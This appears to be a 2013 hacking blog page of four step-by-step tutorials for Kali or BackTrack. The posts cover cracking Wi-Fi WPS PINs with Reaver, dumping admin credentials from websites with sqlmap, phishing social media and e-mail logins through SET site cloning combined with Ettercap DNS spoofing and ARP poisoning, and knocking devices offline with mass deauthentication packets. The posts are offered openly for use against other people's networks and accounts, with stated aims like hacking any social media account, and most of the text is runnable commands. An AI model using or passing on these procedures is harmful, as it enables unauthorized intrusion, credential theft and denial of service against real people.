Monday, 23 December 2013

How to crack WPS enabled networks :


How to crack WPS enabled networks :

REAVER: WPS SYSTEMS (wireless protected setup)

(tool included with backtrack/kali)

NOTE: try to spoof your computer before running reaver sometimes it won't work but atleast try to spoof!!!

open a terminal and type:

1) ifconfig wlan0 down

2) macchanger -r wlan0

3) ifconfig wlan0 up

type: ifconfig (to make sure your mac was spoofed)

REAVER:

open a terminal and type:

1) airmon-ng start wlan0 (*wlan0 or your current interface)

NOTE: this will start mon0 mode:

spoof mon0:

ifconfig mon0 down

macchanger -r mon0

ifconfig mon0 up

2) find target wps enabled network: open a new terminal and type:

wash -i mon0

3) start attack:

reaver -i (interface) -c (channel #) -b (target bssid) -vv

example: reaver -i mon0 -c 7 -b F6:00:14:D4:11:D0 -vv

4) now let reaver run until the pin is cracked,
this could take anywhere from 4 - 24 hours to crack

---------------------------------
notes:

1) if reaver hangs press: control + C, this saves the current session,
shut down the terminal and restart reaver,
at times you may need to reboot your computer.

2) command line examples :

reaver -i mon0 -c 7 -b F6:00:14:D4:11:D0 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360

-S = small keys (faster cracking attempts)
-N = no nacks or out of order packets
-L = ignore locks
-d 15 = delay 15 seconds between attempts, you can choose your set time to delay
-r 3:15 = reoccuring delay 15 seconds for every 3 attempts,
you can choose your set time for every amount of X attempts
-T .5 = message timeout period, measured in seconds
-x 360 = sleep time period for 10 failed attempts, measured in seconds

good command lines :

reaver -i mon0 -c 7 -b F6:00:14:D4:11:D0 -vv -S -N -L -x 60

Posted on 08:12 by Unknown

No comments

SQL INJECTION # 1 :


Today We are here to show a method named as SQL injection ,with the help oF this methOd you can hack websites.
Lets start:

(backtrack/kali linux)

first search the page of the admin you want to inject, using an online service :

scan.subhashdasyam.com/admin-panel-finder.php

copy the name of the site into: enter url: click dump

select admin page: search for admin credentials using sql map:

OR

www.sc0rpion.ir/af to find login page online

FINDING ADMIN LOGIN(2):

www.site.com/admin
www.site.com/login
www.site.com/wp-admin.php
www.site.com/administrator
www.site.com/admin.php


^(optional)^
-------------------------------------------------------------------------
SQL INJECTION : SQLMAP :

1) open a new terminal and type : 

sqlmap -u (paste web-site) --dbs

2) after the scan look for available databases :

3) type in: 

sqlmap -u (target site) -D (database) --tables 

4) after the scan copy (*admin)(white letters) and type :

sqlmap -u (target site) -D (database) -T (*admin) --columns

5) after scan type: 

sqlmap -u (target site) -D (database) -T (*admin) -C (*username) --dump

(look for username in white lettering in column)

6) after scan type: 

sqlmap -u (target site) -D (database) -T (*admin) -C (*password) --dump

(pwd will be in white lettering - usually hashed and will need to be decrypted)

7) google decrypt hash online: (md5decrypter...etc...) 

(* = substitute found table or column content)

-----------------------------------------------------------------
logs stored in : /usr/share/sqlmap/output

Posted on 08:07 by Unknown

No comments

Phishing :


Today We are here to show a method called phishing ,by this Method you can hack any social media users account and control them.
Lets start:

NOTE: before attempting this : open a terminal and type :

leafpad /etc/ettercap/etter.conf

then delete the # signs in this text :

# redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
# redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

should look like this :

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

SE-TOOLKIT AND ETTERCAP: PHISHING 1:

1) open se-toolkit (set)

2) press options in this order: 1,2,3,2

3) enter your i.p.

4) type in the desired web-site to clone

NOTE: to capture login credentials of e-mail sites be sure to type in the exact address of the login screen, not the home page!!

5) open a new terminal and type in this command :

leafpad /etc/ettercap/etter.dns 

or

nano /etc/ettercap/etter.dns

6) remove the 3 websites and i.p.'s and replace them with your desired page to spoof, then save :

microsoft.com A 192.168.1.1
*.microsoft.com A 192.168.1.1
www.microsoft.com PTR 192.168.1.1

^ CHANGE ^
EXAMPLE:

facebook.com A (your i.p)
*.facebook.com A (your i.p.)
www.facebook.com PTR (your i.p.)

7) open Ettercap (GUI): click sniff: unified sniff: select the interface: click hosts: scan hosts: reclick hosts : click list hosts :
add the gateway i.p. as target # 1 : add all target i.p.'s as target #2 : click plugins : select dns_spoof : select MITM : click arp poison 
(select remote (for multiple devices connected to network) or ( one way) for one device on network) : click start sniffing

 now be patient and wait for tagrets to login and keep and eye on SE-TOOLKIT for credential info!

(also ettercap 0.8.0 now captures any login and password credentials!)

NOTES: 

1) when changing a page to spoof you have to exit ettercap and set then disconnect from the network,
edit ettecap config and redo the above steps 

2) recommended e-mail spoofs:

yahoo.com A 
*.yahoo.com A 
www.yahoo.com PTR

facebook.com A 
*.facebook.com A 
www.facebook.com PTR 

aol.com A 
*.aol.com A 
www.aol.com PTR 

e-mail logins:

https://my.screenname.aol.com/ A 

https://login.yahoo.com/ A

https://accounts.google.com/ A

3) where se-toolikt info is stored : after control+C is pressed:

File exported to /root/.set/reports/XXXXX.html for your reading pleasure...
[*] File in XML format exported to /root/.set/reports/

also look in :

file system /usr/share/set/src/logs/

Posted on 08:01 by Unknown

No comments

How to DOS a networks devices with deauthorization :




Today i'm gonna sharing this tutorial that how to DOS network devicecs with deauthorization.
Lets start:
(using backtrack/kali linux)

(networks within reach of your computer)

Disconnect from any network you are on,
this attack is fully capable while you are offline

open a terminal and type the following commands :

airmon-ng start wlan0 (or type your current interface, usually wlan0)

airodump-ng mon0

(now airodump-ng will scan for networks)

when the target network mac address (bssid) is found type :

airodump-ng -c (users channel#) -w (create file name) --bssid (type bssid#) --ivs mon0

example: airodump-ng -c 7 - w ABC123 --bssid F6:B4:22:0D:14:B2 --ivs mon0

(the above command will dump the target networks current active devices)

Now open a new terminal(keep other terminal open) :

type :

aireplay-ng --deauth (# of deauths to send) -a (type bssid) -c (type station) mon0

example: aireplay-ng --deauth 1 -a F6:B4:22:0D:14:B2 -c D0:22:14:F8:00:D4 mon0

(Note : keep entering the above command until the correct channel of the network is found,
you will be able to tell if the command is running or not)
(Note : -c is actaully the mac address of a current active device on the network)
(Note : for a long term DOS use 1000000's of deauth #'s)

DOS IS ENGAGED!!!

Note : you can open up what seems to be endless terminals with the aireplay-ng command
for each different device mac address on the target network, also after starting
the attack you can click back on the first terminal to see if the power of the
device is at 0 (which is the goal), and at last you can do multiple networks at once.

Posted on 07:46 by Unknown

No comments

Subscribe to: Posts (Atom)